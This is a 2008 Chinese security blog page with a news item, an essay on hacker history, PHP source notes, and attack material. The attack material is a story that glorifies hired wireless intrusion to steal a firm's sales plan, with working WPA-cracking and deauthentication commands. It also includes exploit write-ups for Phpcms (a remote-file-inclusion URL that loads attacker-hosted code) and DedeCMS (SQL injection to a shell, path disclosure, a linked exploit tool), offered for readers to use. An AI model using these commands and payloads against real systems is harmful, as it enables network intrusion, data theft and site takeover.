木易的安全blog

新Web攻击可劫持剪贴板

Wed, 20 Aug 2008 19:36:29 +0800

BBC报道,安全厂商F-Secure最近发出警告,已经发现有基于Web页面的攻击开始瞄准剪贴板.
剪贴板是用户最常用的系统功能,用户经常用它来复制网页地址,而打开一个攻击页面之后,用户的剪贴板就会被清除并且被插入恶意链接,这样,用户习惯地把复制的地址贴入地址栏时,就会被定向到恶意站点,并且这种攻击是连续的,用户重新启动也无法清除掉.

目前已经发现部分Flash恶意空间包含该功能(因为IE7已经对Web内容替换剪贴板做了识别,但Flash控件却一直处于放开状态),这是一个相当聪明的技术

入侵的艺术(无线渗透)

Wed, 20 Aug 2008 19:30:29 +0800

本文作者:OrphousV

Bacchus昨晚一宿都没睡好，一是因为昨天深夜下了场大暴雨，电闪雷鸣的，二是内心空虚。他已经好长时间没有练手的机会了，以致他曾一度怀疑自己是不是被遗忘了。这天一大早，电话就叫嚷起来，把他从睡梦中猛地拉了出来。当他晕晕地接听电话时，他竟然从床上蹦了下来。事实说明，他并未被遗忘。

“最近，有一家公司想要我们窃取Seraph公司的本年度销售计划，当然，其它的信息越多也越好。至于报酬，就得看你的想像力了。你最近要是有时间的话就开始吧。我已经帮你简单地看了下，那公司的网站服务器的操作系统是Gentoo，网络设有硬件防火墙，用了IDS。祝你好运！”

Bacchus一下子就听出了这是Ezekiel的声音。接到这条消息后，Bacchus变得异常兴奋，特别是在听到报酬情况时。当然，他实际上并不在乎报酬，入侵是他的爱好，那些报酬只是能让他过得好点罢了，他真正在乎的是他没有被遗忘。

他从床上蹦下来后就立刻开了机。他做了几个跳板后就操起了他常用的兵器。他用了nmap扫描端口，有检测了网站是否存在注入、跨站、文件包含、跨目录、暴库等常见漏洞，他还检测了服务器是否存在溢出漏洞。不幸的是，服务器坚如磐石，无懈可击。他心里想：看来用Gentoo作系统的管理员果然不是一般货色。忙活了大半天，他却一无所获。肚子这时也开始闹腾起来，于是他从冰箱里拿出了几片面包，一下子塞了进去，打发了肚子，还不忘用牛奶讨好一下它。

这一天，他九点就睡了，但始终想着那档子事，一直没睡着。于是他拨通了Moses的电话，想得到点启发。恰巧Moses也没睡。电话一接通，Bacchus就开始诉苦，Moses听完后说：“你也许该换个思路。”Bacchus不好意思聊地太晚，免得打扰别人，便草草收了尾。

第二天清早，他就打开了Seraph公司的网站，他注意到了主页底端的地址——那公司就在当地，尽管离他家还有一定的距离。于是他决定亲自去打探点信息。由于最近油价飞涨，他决定做公汽去。临走之前，他被客厅内镜子中的自己的爱因斯坦式的头型吓了一跳，他这才猛然惊醒，意识到自己还要再好好准备一下。望着镜前的自己，他想到了什么——他目前还是单身。不过他喜欢这种生活，他曾说他是认真的，并发誓他决不会哪天撞上谁后又赞美爱的伟大。他原来还打算终身不娶，不过之后便淡去了这个念头。他立刻回到了现实，带上了自己的PDA，把耳机塞上，以听音乐来打发旅途的时光。他想起了Moses的话，他在 Windows Mobile上打开了WiFiForm进行对无线接入点的侦察，暗自想着也许会有什么以外收获，到时候或许会探测到Seraph公司的内部无线接入点。至于听什么，他想了想，就选了Stravinsky的《火鸟》，因为他算了下，到Seraph公司大概需要20分钟，到时候恰好可以听完，更重要的是，他尤其喜爱这一部作品，特别是其中的《公主之舞》。

他喜欢轻装上阵。

下车后，他看到Seraph公司就在不远的地方。他走进了Seraph公司的大楼，咨询了一些业务。服务人员的态度很好，但守口如瓶，丝毫没有透露一点内部信息，这令Bacchus感到很失望。谈了很长时间后，那服务人员的热情依旧未冷却，但Bacchus已经意识到没有必要再谈下去了，因为他右耳内的耳机已传出美妙的旋律——“发现无线接入点”。

于是他草草谢了那人就离开了，紧接着他就去了洗手间，见里面没人，便从口袋里掏出了他的PDA。他真算是收到了一份十分不错的贺礼（如图1）。

500)this.width=500;" />
他决定第三天发起总攻，因为他知道无线入侵也许要花很长时间，况且是对一个安全似乎做得不错的公司网络进行无线入侵。

第三天，他决定开车出去，进行War-Driving。这次，他用的是笔记本电脑。

到了Seraph公司后，他便开始在它周边缓慢行驶，因为这样便于他进行操作，当然，油价也是个不可忽略的原因。他开始播放Tchaikovsky的《1812年序曲》的CD，因为他知道这首曲子可以在短短4分钟内激发他的全部斗志。

他把每次入侵都看成一次表演，而他的主要任务不是对着屏幕呆板地敲击键盘，而是把入侵艺术化。他总会事先在大脑中写下一些基本的剧情，当然，他自然就是男主角了。他表演的时候十分投入。

Bacchus将自己刻录的BackTrack3 Live CD轻轻推入光驱，接着他从光盘启动，进入了BackTrack3。他欣喜异常，就像是见到了自己久违的朋友。确实，他已经有很长时间没有见到它了。不过，他仍然对BackTrack3十分熟悉。

他打开命令行，输入了“iwconfig”命令来检查他的无线网卡是否被他的老友识别。答案是肯定的。（如图2）

500)this.width=500;" />
他的无线网卡的标识为“wlan0”）然后，他用Kismet对无线接入点进行扫描，成功地扫描出了昨日邂逅的那个Seraph内部的无线接入点（如图3）。

500)this.width=500;" />
在扫到那个AP后，他还是结合了GPS定位确定了下，结果是那个AP绝对是Seraph公司的AP，这从地图上可以清楚地看出来。他将光标移动到那个条目上，干脆地敲了下回车键，Kisnet便显示出了那个AP（无线接入点）的详细信息（如图4）

500)this.width=500;" />
并记下了那个AP的SSID、bssid和Channel，紧接着，他又返回主界面，仍选择那个AP，按下“SHIFT+C”键，记下了目标AP的MAC地址（如图5）。

500)this.width=500;" />
他还发现Seraph公司的无线网络是用WPA加密的，这意味着破解的难度相对于WEP加密来说要大很多。然而这却正中他的下怀，他正是期盼这种具有挑战性的表演任务。

下面，他将网卡调节到“monitor”模式，并将其频道设置为3（Seraph公司AP的频道），接着就开始嗅探并抓包了。他输入了如下命令：

iwconfig wlan0 mode monitor

iwconfig wlan0 channel 3

airodump wlan0 capture1 00：a0：c5：90：40：df

可以看到，IV（初始化向量）的数量正不断增大。（如图6。）

500)this.width=500;" />
为了方便获取WPA握手验证包，Bacchus发起了DeAuthentication攻击。虽然这会使AP不稳定，但这却是破解WPA加密的重要手段。他输入：

aireplay -0 10 –a 00：a0：c5：90：40：df wlan0

他只是试探性的进行了攻击，发送成功。于是，他开始不断攻击。伴随着攻击次数的增多，IV数量也在较快地增长。

几个小时后，IV的数量就差不多达到破解的要求了。Bacchus便开启了aircrack进行同步破解，不过还是花了将近2个小时才破解出来。

影片中的高潮已经过去，最后就应该是个十分美好的结局。

得到了密码，Bacchus连上了Seraph公司的AP，进入了公司内网。这里他几乎畅通无阻，他尽可能地找些自己觉得有价值的信息，当然，他最终找到了Seraph公司的销售计划。

他准备回家时，已经是月色朦胧了。回家的路旁栽种了茂盛的棕榈树。他把车停在他家附近的一个停车场，便徒步走回家。那棵梧桐树下，照旧有几个大爷大妈坐在一起聊天，那些都是住在他附近的人。Bacchus走过去，微笑着向他们问好，他们也向他致意。在他们眼中，Bacchus总是那么热心。他也不忘到前面的Venus花店买一束鲜花，摆在自己的窗台上，这些花大概是他凌乱房间唯一的风景吧。花店里，那个叫Europa的女孩正在一旁欣赏着 Stravinsky的《火鸟·公主之舞》。Bacchus见她十分投入，便不忍心打扰她。他自己从各样的花中挑选出了一支玫瑰，他的脸不知为何突然一热，又把玫瑰放了回去，转而挑选了蓝紫色的鸢尾花和纯净的白茅。他把钱放在柜台上，又似乎不小心在柜台上零落一点茅草芽，然后便悄然离开了。

他把馨香的它们放在花瓶里，又将花瓶放在对着街道的靠阳的窗台上。

Phpcms 2007 远程文件包含漏洞

Wed, 20 Aug 2008 19:29:51 +0800

该cms的核心配置文件/include/common.inc.php有缺陷
--------------------------------------------
//23行开始
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
unset($_POST, $_GET);
------------------------------------------------
这里extract函数会导致变量覆盖，可能引发一系列的问题

我们看/yp/admin.php，这个文件名字是挺吓人的，还带admin。但是注册个企业用户就可以访问该页面了，我们看部分代码
------------------------------------------------
//从头开始看
$rootdir = str_replace("\\", '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php';//通过extract可以覆盖$rootdir为任意值
require PHPCMS_ROOT.'/languages/'.$CONFIG['adminlanguage'].'/yp_admin.lang.php';
if(!$_username) showmessage($LANG['please_login'],$PHPCMS['siteurl'].'member/login.php?forward='.$PHP_URL);
require $rootdir.'/web/admin/include/common.inc.php ';//触发远程文件包含
------------------------------------------------

利用的方式可以先在你的网站 site.com上放置/web/admin/include/common.inc.php这样的目录和文件，当然common.inc.php就是你的恶意代码，然后注册个用户访问网站并提交
http://target.com/yp/admin.php? Rootdir=http://site.com/即可。

最后多说一句，php5默认不开启远程文件功能，如果想包含本地文件又要被gpc限制，所以看上去这个漏洞挺鸡肋的。不过qiuren同学提供了一个不错的方法，可以旁注一个shell写/web/admin/include/common.inc.php到/temp目录然后包含之

dedecms tag.php注入漏洞分析与利用

Wed, 20 Aug 2008 19:27:22 +0800

author:toby57 [www.toby57.cn]
date:2008-08-18

Dedecms算是使用比较广泛的PHP整站系统了，在被使用的同时系统的安全性也被人们关注。在以前dedecms也爆过不少漏洞，官方都很快出了补丁。不过今天说的这个漏洞与多字节编码无关，倒跟URL编解码有关系，

呵呵。仅测试了DedeCms2007(DedeCms V5.1 [sp1])。
目录下的tag.php文件对变量$tag处理不当，导致注入漏洞的形成，话不多说，贴代码：

if(isset($_SERVER["QUERY_STRING"])){
$tag = trim($_SERVER["QUERY_STRING"]); //得到GET的参数
$tags = explode('/',$tag); //以“/”分隔为数组$tags
$tag = $tags[1]; //取数组$tags的第二个元素
if(count($tags)>3) $PageNo = intval($tags[2]);
}else{
$tag = "";
}
$tag = urldecode($tag); //对变量$tag做URL解码处理，%27解码后就成了“'”
//如果没有Tag或Tag不合法，显示所有Tag
if($tag=="" || $tag!=addslashes($tag) ){ //如果$tag为空或有'、"、\等字符则执行
$dlist = new TagList($tag,'tag.htm'); //创建类TagList的实例,$tag传给其构造函数，此时$tag可能包含“'”
}
//如果有Tag，显示文档列表
else{
$dlist = new TagList($tag,'taglist.htm');
}

类TagList相关代码：(./include/inc_taglist_view.php)

class TagList
{
..
var $Tag;
..
//php5构造函数
function __construct($keyword,$templet) //$keyword=$tag
{
..
$this->Tag = $keyword; //$this->Tag=$tag
..
if($this->Tag!='')
{
$this->TagInfos = $this->dsql->GetOne("Select * From `#@__tag_index` where tagname like '{$this->Tag}' "); //查询执行，漏洞产生！
}

以上就是代码的分析，可能说得不太清楚，这样的漏洞因为可以使用“'”,所以如果条件可以的话可以直接into file得SHELL。
利用方面大家自由发挥。为了方面我自己写了一个利用程序(http://www.lovettl.cn/tf/dedeExp.rar)

500)this.width=500;" />
当File_priv为YES并得到了物理路径的时候就可以直接Get the shell了。其中得到物理路径的方法是利用了./include/htmledit/index.php的一个漏洞，我们提

交./include/htmledit/index.php?modetype=basic&height[]=toby57就可能得到路径。

如果这样得不到的话，还可利用重新安装漏洞，提交./install/index.php?step=2可以重新安装系统，当然也可以得到物理路径。

因为不能union查询，所以运气差的只有自己Get the hash再破解进后台拿SHELL了。

现代黑客史

Wed, 20 Aug 2008 19:26:11 +0800

全球黑客史话从19世纪60年代麻省理工学院揭开序幕，硅谷也就是早期的黑客纵横驰骋的疆场。时隔两个世纪后，在亚洲的另一块巨大的版图上再现黑客传奇，尽管中国黑客仍处于萌芽状态——技术共享与精神自由的局限。
时至今日，国家不同的体制仍制约了技术的高速发展，在中国便恰恰如此，它滞后了高新技术的进步，当然，这种体制是由当权派制定的。在中国，无数的激进分子抱怨尚未看到史诗般的黑客传奇，预计的未来仍会保持这种平和状态。东方大国从来不缺乏媲美于凯文•米特尼克一样的全球头号黑客，而在体制的重压下，技术自由的浪漫者主义便迅速胎死于腹中。
体制决定了一切，它击溃了互联网最原始的自由、免费、共享，每个国家都有想牢牢地控制互联网混乱而迫切的心态，它们通过不同的技术手段建立起国家的意志，这一时期叛逆的年轻黑客与深谙社会局势黑客前辈们都被迫找出最适应的生存之道。

第一篇走向两极分化
1990年美国发生的黑客严打活动将当局的恐惧表露无遗，即“一.一五”电话系统大瘫痪，这起软件的原因使得AT&T忍诟蒙羞，但当局有更多理由相信这是蓄谋已久的高智商犯罪，并使得民众第一次感受到黑客对现代社会的威胁。与此相似的经历是在2006年初具网络规模的中国爆发了“熊猫烧香”病毒，这并未使用驱动而采用了API的病毒不断变种发狠般席卷了中国半个互联网，惊恐未定的网民以及媒介大肆渲染黑客威胁的舆论，这进一步促成八个政府部门及20家机构研究并提交十七大提案《网络安全法》。
年轻的生力军以80年代渐成主流，他们嘲笑与自身格格不入教育制度，险恶的社会环境令他们叛逆桀骜不已，张扬个性的他们很快在宽阔的互联网寻找到刺激的快感，他们从不顺从长辈循规不绝的劝告，来自学校的处分、训导是家常便饭，他们以抗拒的态度做自己兴趣的事来逃避僵化的思维。正如你所见，初次的反叛是在彼此站点插上入侵后胜利的旗帜，大多数学历仅为中专、高中、大专的他们横扫全国名牌大学服务器以彰显自己强大的能力，以CCTV新闻专栏曾报导的李俊、朽木等作为代表。随时间与阅历的增长使得他们逐渐收敛昔日的锋芒，处于黄金时代的他们知道如何抉择未来方向，包括寻找宝藏与黑客道义。
另一方面，尚未完全解决全国温饱的中国迎来连接不断的全球通货膨胀经济问题，单由通信、信息垄断的企业与机构便阻碍了IT技术的发展，出台的部分政策仍然没有消除地区贫富差异，这间接地导致了绝大部分中国黑客的变质，为解决赖以生存的低层需要开始了技术呈多样化的转变为金钱，这便解释了70年代最初的前辈为何建立商业公司及担任政府安全顾问。人们需要一个合理的解释：为何自由向往、令人神秘的黑客不会一直游荡于数字网络？显然，中国黑客在体制面前是现实的。
同样地，黄金时代也开始出现了随处可见低龄“黑客”群体，他们比上一代更加的张狂、盲目而又充满无限的好奇，他们乐于牺牲与家人交流的时间来寻找最新攻击、速成的入侵来娱乐，图书市场与网络充斥了随处可见黑客教程与黑客工具，而千疮百孔的中国南北网络则为他们提供了无限的练兵场，同时也开始尝试使用傻瓜化易语言为自己编写简便的程序。当然，这股新生的力量仍会在强者的面前保持谦恭的态度虚心求教，他们唯一的目标是站在巨人的臂膀取得不菲的成绩。
“巨人”敬畏的尊称与年龄、民族、国界没有限界，泛指坚守传统黑客道义精神的小群体 ——低调而不为大部分人所知。有的正参与着导师的程序项目；有的就职于IT公司的安全管理者；有的信守原始黑客精神的自由职业者，他们愿意用额外的时间翻译技术文档，或是撰写原创的paper无偿发布在专门的论坛、Mail-list中，他们试图以微薄之力唤醒原始的黑客道义。
是时代决定了技术发展趋势？还是个人意志主导了时代的变革？黄金时代的黑客们开始随着局势变得动荡不安，有坏的消息，也有好的消息。

第二篇黑金交易
数字网络中的黑金交易无缘于现实中的毒品、军火、期货、黄金等高额风险的物品，而网游中虚拟游戏装备的账号、Alexa顶级排名的网站权限与流量、数百万条客户隐私记录的刷库、大量傀儡主机组成的僵尸网络以及专门定制的病毒、未公开的0day等组成新闻媒体的常见称呼——黑色产业链。然而，不管有多少记者、专家用负面的看法将黑客描绘成阴险的盗窃对此口诛笔伐时，这只不过是整个社会产业链中微小的一部分而已。
在讲述黑金交易的内幕时我得打消你脑中的错误看法：他们绝非暴利阴险的犯罪分子，不善交易的他们也被迫接受自上而下的压榨、背叛，获得利润与期货投机者相形见绌。不管如何，他们对社会负面的影响是不可否认的。
技术转化金钱的始端经过了一系列的摸索与演变，最先为大众所熟知的是黑客VIP培训，它满足了中国这一时期的市场需求，大量的低龄化、渴望提升技术的学生群体纷纷掏钱购买傻瓜化入侵教程或VIP软件走向黑客道路。而真正将黑客技术转变真正的商业行为则是起源于臭名昭著流氓软件CNNIC的中文上网，它的作用是在客户端将中文解析为对应网址，为此，CNNIC通过插件、软件捆绑的进行病毒式的传播获取了庞大的经济效益。这成为很多互联网产商争相模仿的对象，他们使用了更为凶狠的手段来推广、顽强地未经许可占领普通用户电脑，这一手段称之为黑客技术，不同的流氓软件会相互干掉彼此、偷窃用户信息、弹出广告等，政府在面对越来越多的用户投诉、司法诉讼前推出了新法规以使产商收敛流氓行为，这一时期，黑客们也看到了曙光。
以流量、广告作为基础的前提下，黑客们以二三人组成团队针对IE浏览器及第三方控件推出恶意劫持插件，插件可以在用户不知情的前提下隐藏地刷广告、流量，并入侵大型的站点进行挂马，做成病毒的形式大范围传播获取暴利。明智的黑客看到了更多的机遇，一台肉鸡可按不同国家以几毛至数十元出售；肉鸡中的游戏、聊天等网络软件的账号、游戏装备可盗取并出售；安装DDOS服务端可使其成为傀儡网络的一部分而提供DDOS服务；肉鸡又可以制作入侵跳板或搜集主机敏感资料出售……
与此同时，黑客们开始了明确的技术分工，入侵的流程简化成：扫描、提权、漏洞利用、木马种植。漏洞利用即针对性的攻击工具，但更多的人并不愿意公开那些 0day，任何影响OS或是WEB严重程度的0day可按5~6位数出售；木马开发者在市场的需求下出现了可定制、可突破特定的杀毒软件的功能，同时，全球主要的游戏运营商也陆续地发现大量针对游戏而开发的外挂、游戏木马越来越多；软件破解者让杀毒软件产商顾此失彼，如灰鸽子的不断免杀带来是病毒不断繁殖、变种。
全球互联网以娱乐风行的是中国，这与国情看上去是相当搭配。当然地，商人们确信游戏是最佳的生钱手段，他们大多数开始把重心放在游戏上面，至少目前仍然如此。了解机遇的商人们组建了游戏工作室，并在黑客站点、黑客社区购买广告位进行高薪聘请黑客加入，商人将事先整理出全球游戏站点、社区的网址让黑客拿下数据库，或者挂马，以便尽最大的手段让他们箱子里的信越来越多，信越多，他们就会赢得一场“游戏”。
令人沮丧的是，在黑金交易的过程中，商人才是最大的赢家，不善谈判技巧的黑客们被利用了。当然，游戏远远还未终结……

第三篇拥兵传奇
时间的沉淀与需求让一部分黑客看到前所未有的机会，他们开始了一系列的转变，包括不再单打独斗、逐渐淡出圈子、清洗黑客身份……在本篇，我将为读者透露比黑金交易更为隐晦的内幕，并且，它有可能触犯某些人利益而使他们大为光火，也有可能对兴趣黑客带来深远影响，但作决定的永远是自己。
在最近的几月出版一本安全主题图书后，我解答一位高中生读者对未来事业的困惑：我拿不到本科是否有其它的生存之道？我说：你绝对不需要为那该死的东西浪费20年左右的时间，你向我证明拥有拿下新浪网站的实力，我会马上从信用卡划出10万或者更多聘请你！亲爱的读者，我向你保证这是真的，当然，也不要误会我在试图改变你的理想，你将看到的社会更加现实，过去的成功靠机会，现在的成功靠实力，如果一些黑客们正拥有强大的实力时，拥兵传奇正好开始。
最先开始是冒险的商人看到比搞游戏库更暴利的机遇，他们盯上了境外的博彩站点，他们所雇佣的黑客实力将是中国上层的，给出的酬谢金多为6~7位数。冒险的商人会通过黑客圈子的关系筛选出适合与他们合作的人，他们爽快也善于谈判：如果您现在动身过来，我们将准备100万现金让您过目！显然，这颇具诱惑力条件是令人着迷的，但这是少数实力黑客的待遇。尚若你想了解更深的雇佣内幕，且实力相当优秀，没有问题，他们会马上通过线人来联系你。除了以高薪作为说服的理由，他们还会解释这行业将是相当的安全而保险，因其性质而使各国政党无权插足于此。
熟悉安全行业规则的朋友早已知晓，国内的信息安全公司为何种对象服务、开发的产品成本如何、产品又怎样地卖出了高价等等。我不想以绝对负面的看法评价国内知名度极高的信息安全公司产品以及服务如何，单由坊间的信息便显示他们未完善自身的WEB安全，比较形象的例子是，当你在博客放置了一篇关于入侵其WEB的截图，他们的公关有可能动用行政权力说服你删除该主题。为此，我将从个人的经历让读者们了解到珠海某硬件防火墙公司的运作，需要说明的是，我没有被对方雇佣，而是被对方的诚意蒙蔽被利用了。在高中时我应那家公司的老总的邀请管理着他们的安全论坛，这期间他向我展示公司未来宏大的发展蓝图，并作为前辈身份讲述如何规划人生，这让我感觉他值得依赖并开始帮助他安全审计广东的政府站点，直到后来我的好友告诉我被骗了，他说：你找到的广东省政府站点的漏洞都被他当作推广UTM硬件防火墙或出售安全服务了，把省厅的单都搞定了，那老总获得来自政府相当丰厚的利润。显然，这令人懊悔不已，因为我曾在此花费了数个夜晚精力，当然，我不能去指责那家公司毫无道义，因为老总曾给了我千元不等的微薄的钱。
国内的安全公司发展越来越快，并短时间拥有雄厚的资金和背后力量，显然，政府在机密信息保护方面缺乏技术力量，他们不得不将国有资产使用安全公司造价不菲的产品保护，包括那种虚假的安全感。同一时期，圈子里的人察觉到他们身边的朋友陆续开始被招安洗白身份，比如进入国家成立的NISEC等等，一方面作为保护机构信息安全，另一方面才是关键——全球情报处理与监控。
网络情报表现得更加明显是起因于北京2008奥运会，在更早的2006年左右的国家安全局已悄然准备，包括全国范围内的各地网监也开始行动，那些海外流亡的异议人士成为首要的监控目标，政府需要为杜绝 8月的动乱做好准备。让他们感到沮丧的是，他们缺乏优秀的网络攻防经验者，随着奥运临近的他们急于求成，我的数个就读于大学以及小组的朋友已接到来自上面领导的重任以及单子，给出优厚的条件目的是获取情报。这一事实圈子里很多的人都知道了，毫无秘密可言，回报是丰富的。
另一方面，网监为了掩盖他们在网络监控的脆弱，他们成立了旗下的代理公司，公司表面上是正规的程序开发、数字取证，但实际上是为网监研发网络审查（关键字过滤、监控）、网络跟踪、加密破解等产品，并提供情报服务。根据一份信息显示，中科院在内容分析处理的技术做的相当好，以.Net为框架的优秀算法的语义分析程序，该程序可自动识别一篇文章作者的观点是正方还是反方。
限于篇幅不对类似其它商业雇佣黑客偷窃庞大的用户隐私信息作出完整的概括，而我们都能感觉，主宰网络战争的黑客传奇尚未停息。

第四篇原始的乌托邦
在我们每一个人的心中都渴求一种理想的国度，一个并非真实的国家，一个虚构的国度，有着至美一切，没有冲突与纠纷，一个乌托邦的国度。
对于一个信奉技术自由的狂热分子来说，他们正需要那样至美的国度，但这都是存于脑中幻想的天堂，是的，崇尚自由的黑客在发展的中国家都不是完美主义者，而是任何明眼者只需一瞥就窥见了其现实问题。旁观者在听到黑色产业链时，他们悲叹：中国的黑客缺乏应有的黑客道德，他们不再为黑客技术创新，包括不再探究操作系统与应用软件漏洞，他们以金钱作为驱动力……
在本篇，我想扫盲那些旁观者所局限的看法，就全球范围来说，每一个国家都有一套不同的自上而下、自下而上的政治体系，你可以认为是体制；每一个国家又有区别于其它国家的文化道德与传统习惯，你可以认为是国情。它们影响的并非仅是中国黑客，而是全国范围内的职业者，经济、文化、政治等等因而不同。正如第一篇的解答，中国尚未解决全国的温饱问题，青年群体面临生存压力，传统的教育制度扼杀大量人才……这一系列的问题都影响着“中国黑客”，影响着黑客文化的氛围，当然，我说这些影响的因素完全是个人的主观看法。
当不再为生活的下一顿饭而困扰，当编写的开源代码广受赞誉而不被篡改版权，当发布的漏洞公告不被一些机构盗用出售，当技术能有一套良性的循环而产生价值时，我想，中国的黑客将一如网络中侠士般让人敬仰，他们不再有太多的条条框框的顾忌，因编写优质的代码而享受精神的愉悦。
毫不讳言，计算机安全是所有行业中技术成长最快，安全与攻击每天都创造出新的模式，黑客们一直都为此骄傲，因为他们时刻都在学习新的东西。对于发展的中国来说，应该抗拒浮躁的心理，追逐那原始的黑客信仰：自由、免费、共享。同时，在最后，中国的黑客史话仍然没有结束，它仍在演绎着来日的传奇。

PHP 源代码分析

Tue, 19 Aug 2008 00:16:50 +0800

假如您看完本文后有什么看法，请点击这里到论坛发表．

PHP源代码分析
1. 目录结构
2. PHP使用Lex和Yacc对语法进行解析。
3. PHP如何使用Mysql？
4. 安全模式？
5. 那些是 PHP 的标准函数，那些是扩展函数？
6. PHP 源代码中的PHP_FUNCTION(xx) 宏。
7. 那些函数集是标准的？
8. 一些函数的实现过程
9. PHP 函数集注册过程
10. 有趣的Zend LOGO图片
11. PHP的语法树？
12. 从 CVS 获取 PHP 源代码

1. 目录结构
1. build 和编译有关的目录。
2. ext 扩展库代码，例如 Mysql、zlib、iconv 等我们熟悉的扩展库。
3. main 主目录。
4. sapi 和各种服务器的接口调用，例如apache、IIS等，也包含一般的fastcgi、cgi等。
5. win32 和 Windows 下编译 PHP 有关的脚本。用了 WSH。
6. Zend 文件夹核心的引擎。
7. scripts Linux 下的脚本目录。
8. tests 测试脚本目录
9. sapi 各类 Web 服务器的接口。

2. PHP使用Lex和Yacc对语法进行解析。
在 Zend 目录下有两个文件 zend_language_parser.y 与 zend_language_scanner.l 他们是Lex和Yacc的脚本文件，通过这两个脚本文件生成对应的.c和.h文件，实际上这在 linux 下非常普遍，gcc 也使用它们产生语树。

3. PHP如何使用Mysql？
ext 目录下有一个 mysql 子目录，这个目录中的php_mysql.c 和 php_mysql.h 负责 PHP 与 Mysql 操作。使用了 Mysql 手册中的 C 语言 API。

4. 安全模式？
main 文件夹下的safe_mode.h 和 safe_mode.c 文件负责PHP的安全模式。
5. 那些是 PHP 的标准函数，那些是扩展函数？
ext 目录下英文意思是扩展，而在 ext 下还是有一个 standard 文件夹，存放着 PHP 中的标准函数，例如 explode 这个函数是在./ext/standard/string.c 下定义的。
6. PHP 源代码中的PHP_FUNCTION(xx) 宏。
这个宏用来检验一个函数名称是否合法。合法的函数名称应该由小写字母及下划线组成。
7. 那些函数集是标准的？
通过 ./ext/standard/ 目录我们可以看到以下常用函数集是标准的。字符串函数集、数组函数集、文件及目录操作函数集、md5算法等。
8. 一些函数的实现过程
1. fsockopen, pfsockopen 的实现
这两个函数的实现离不开 ./ext/standard/fsock.c 文件中的 php_fsockopen_stream 函数。具体的socket都在./main/network.c 中实

现。
9. PHP 函数集注册过程
在./main/internal_functions.c 中有一个数组 php_builtin_extensions 默认下有以下成员：

1. phpext_bcmath_ptr
2. phpext_calendar_ptr
3. phpext_com_dotnet_ptr
4. phpext_ctype_ptr
5. phpext_date_ptr
6. phpext_ftp_ptr
7. phpext_hash_ptr
8. phpext_odbc_ptr
9. phpext_pcre_ptr
10. phpext_reflection_ptr
11. phpext_session_ptr
12. phpext_spl_ptr
13. phpext_standard_ptr
14. phpext_tokenizer_ptr
15. phpext_zlib_ptr

接着 php_register_extensions(php_builtin_extensions, EXTCOUNT TSRMLS_CC) 进行注册

10. 有趣的Zend LOGO图片
./main/logos.h 文件中，用 zend_logo 与 php_logo 数组保存了 PHP 标志和 Zend 标志。所以你根本在发行包里找不到zend.gif。
11. PHP的语法树？

1. Lex与Yacc
市面上有这本书。大家可以买来看看，包括GCC都是用它们兄弟生成的语法树。如果对编译器感兴趣。可以翻阅市面上关于这方面的书，并不多就几本。

2. y语法树文件
./Zend/zend_language_scanner.l与./Zend/zend_language_parser.y 规定了PHP的语法。从字面意义上scanner表示语法初步扫描， parser表示语法解析。根据这两个文件lex与yacc可以生成对应的c代码。所以相对来说生成语法是很方便的。

3. 如何定义一个符号
例如 if($language='php') 这一句中的if 就是一个token 语法中我们用T_IF表示。具体在.l文件中如下定义了：
<ST_IN_SCRIPTING>"if" {
return T_IF;
}
这样.php文件中的if就会被翻译成内置符号T_IF。’(单引号)被如下定义：
<ST_SINGLE_QUOTE>['] {
BEGIN(ST_IN_SCRIPTING);
return '\'';
}

4. 复合符号例如最常见的变量命名$discuz_user, $submit 等。
<ST_IN_SCRIPTING,ST_DOUBLE_QUOTES,ST_HEREDOC,ST_BACKQUOTE>"$"{LABEL} {
zend_copy_value(zendlval, (yytext+1), (yyleng-1));
zendlval->type = IS_STRING;
return T_VARIABLE;
}

5. 一个有效的if语句过程
这个定义在zend_language_parser.y 189行:
T_IF '(' expr ')' {
zend_do_if_cond(&$3, &$4 TSRMLS_CC);
} statement {
zend_do_if_after_statement(&$4, 1 TSRMLS_CC);
} elseif_list else_single {
zend_do_if_end(TSRMLS_C);
}
| T_IF '(' expr ')' ':' {
zend_do_if_cond(&$3, &$4 TSRMLS_CC);
} inner_statement_list {
zend_do_if_after_statement(&$4, 1 TSRMLS_CC);
} new_elseif_list new_else_single T_ENDIF ';' {
zend_do_if_end(TSRMLS_C);
}

if 后面必须存在()，圆括弧里面是表达式 expr 表达式在734行被定义：
expr:
r_variable { $$ = $1; }
| expr_without_variable { $$ = $1; }
;
if 后面可以跟 elseif 语句及 else 语句。
从语法树里面我们看出 if () 后面是可以跟 : 的，这一般很少被使用吧。

6. 优先级和左右结合性
一般情况下.y文件中最先定义的操作符优先级相对低，并且可以使用%left、%right 进行描述左右结合性，例如：
%left '+' '-' '.'
%left '*' '/' '%'
%right '!'
这说明'!'在 PHP 语法中是右结合的， '*' '/' '%' '+' '-' '.' 是左结合的，并且'!'的优先级更高
例如语法 !$a + $b 要先计算 !$a 在进行加法操作%left ',' 被放在最上面定义，说明他的优先级最低，因为我们知道','可以等同一个语句。

7. php.ini的解析

1. 如果规定数值正负？
<INITIAL>[ ]*("true"|"on"|"yes")[ ]* {
ini_lval->value.str.val = zend_strndup("1", 1);
ini_lval->value.str.len = 1;
ini_lval->type = IS_STRING;
return CFG_TRUE;
}

<INITIAL>[ ]*("false"|"off"|"no"|"none")[ ]* {
ini_lval->value.str.val = zend_strndup("", 0);
ini_lval->value.str.len = 0;
ini_lval->type = IS_STRING;
return CFG_FALSE;
}

12. 从 CVS 获取 PHP 源代码
1. 安装 CVS 版本工具，例如 TortoiseCVS。
2. cvs -d :pserver:cvsread@cvs.php.net:/repository checkout php-src 具体的CVS使用办法请参考 CVS 手册及其它著作。

PHP.ini 文件的默认配置，定义在 ./main/main.c 342行

-- ./main/main.c -- 342:

/* {{{ PHP_INI
*/
PHP_INI_BEGIN()
PHP_INI_ENTRY_EX("define_syslog_variables", "0", PHP_INI_ALL, NULL,

php_ini_boolean_displayer_cb)
PHP_INI_ENTRY_EX("highlight.bg", HL_BG_COLOR, PHP_INI_ALL, NULL,

php_ini_color_displayer_cb)
PHP_INI_ENTRY_EX("highlight.comment", HL_COMMENT_COLOR, PHP_INI_ALL, NULL,

php_ini_color_displayer_cb)
PHP_INI_ENTRY_EX("highlight.default", HL_DEFAULT_COLOR, PHP_INI_ALL, NULL,

php_ini_color_displayer_cb)
PHP_INI_ENTRY_EX("highlight.html", HL_HTML_COLOR, PHP_INI_ALL, NULL,

php_ini_color_displayer_cb)
